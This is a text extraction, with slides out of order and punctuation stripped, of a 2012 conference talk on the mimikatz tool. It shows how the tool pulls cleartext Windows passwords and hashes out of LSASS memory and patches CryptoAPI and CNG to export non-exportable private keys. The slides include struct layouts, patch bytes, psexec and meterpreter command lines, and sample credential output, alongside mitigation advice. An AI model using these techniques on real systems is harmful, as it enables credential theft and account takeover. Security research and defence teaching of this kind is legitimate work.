ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
